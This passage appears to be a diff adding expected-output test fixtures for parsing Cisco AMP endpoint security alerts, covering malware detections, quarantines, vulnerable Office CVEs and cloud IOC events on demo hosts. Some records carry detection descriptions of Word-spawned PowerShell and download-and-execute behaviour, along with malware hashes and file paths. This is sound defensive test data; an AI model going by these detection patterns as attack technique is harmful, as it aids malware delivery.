"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 695000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 36288, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 691000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 37489, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 684000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 38602, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.0B965CA8AF-95.SBX.TG", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 682000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "84b6f7be5370c1998886214790c6892b", + "file.hash.sha1": "5faebef3bb880489195e80e6656ccf442ff7123b", + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 39856, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "84b6f7be5370c1998886214790c6892b", + "5faebef3bb880489195e80e6656ccf442ff7123b" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:37:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2014-0260", + "CVE-2014-1761", + "CVE-2014-6357", + "CVE-2015-0085", + "CVE-2015-0086", + "CVE-2015-1641", + "CVE-2015-1650", + "CVE-2015-1682", + "CVE-2015-2379", + "CVE-2015-2380", + "CVE-2015-2424", + "CVE-2016-0127", + "CVE-2016-7193", + "CVE-2017-0292", + "CVE-2017-11826" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2014-0260", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260", + "version": "2013" + }, + { + "cve": "CVE-2014-1761", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761" + }, + { + "cve": "CVE-2014-6357", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357" + }, + { + "cve": "CVE-2015-0085", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085" + }, + { + "cve": "CVE-2015-0086", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086" + }, + { + "cve": "CVE-2015-1641", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641" + }, + { + "cve": "CVE-2015-1650", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650" + }, + { + "cve": "CVE-2015-1682", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682" + }, + { + "cve": "CVE-2015-2379", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379" + }, + { + "cve": "CVE-2015-2380", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380" + }, + { + "cve": "CVE-2015-2424", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424" + }, + { + "cve": "CVE-2016-0127", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127" + }, + { + "cve": "CVE-2016-7193", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193" + }, + { + "cve": "CVE-2017-0292", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292" + }, + { + "cve": "CVE-2017-11826", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15152998206589, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-13T10:37:33.000Z", + "file.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "file.name": "WINWORD.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 41214, + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "related.hash": [ + "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:23:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 349000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6508159571352093000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 44193, + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:13.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 312509000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298360312529000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-13T10:13:13.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 45111, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:08.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 162019000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298355162029000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-13T10:13:08.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 46862, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:00:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6508153524038139905", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 606000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508153524038140000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 48509, + "related.hash": [ + "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:24:47.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 693632000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521062325693667300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-12T10:24:47.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 49613, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:15:22.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6532910514396201000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 51389, + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Malwaregen.21do.1201", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "cfdd16225e67471f5ef54cab9b3a5558", + "file.hash.sha1": "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c", + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "file.name": "OLD.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52332, + "process.hash.md5": "38ae1b3c38faef56fe4907922f0385ba", + "process.hash.sha1": "84123a3decdaa217e3588a1de59fe6cee1998004", + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "process.name": "explorer.exe", + "process.pid": 2632, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "cfdd16225e67471f5ef54cab9b3a5558", + "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 53947, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.F2863A.211556.in02", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "c624d61b8f076c3ef05f74eeb96c8954", + "file.hash.sha1": "7d9518ea3f98d037745352b23861fab05d3777dc", + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "file.name": "twhy.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55057, + "process.hash.md5": "92f44e405db16ac55d97e3bfe3b132fa", + "process.hash.sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", + "process.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "process.name": "powershell.exe", + "process.pid": 4868, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "c624d61b8f076c3ef05f74eeb96c8954", + "7d9518ea3f98d037745352b23861fab05d3777dc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 56674, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 516130000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132516139000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 57784, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": 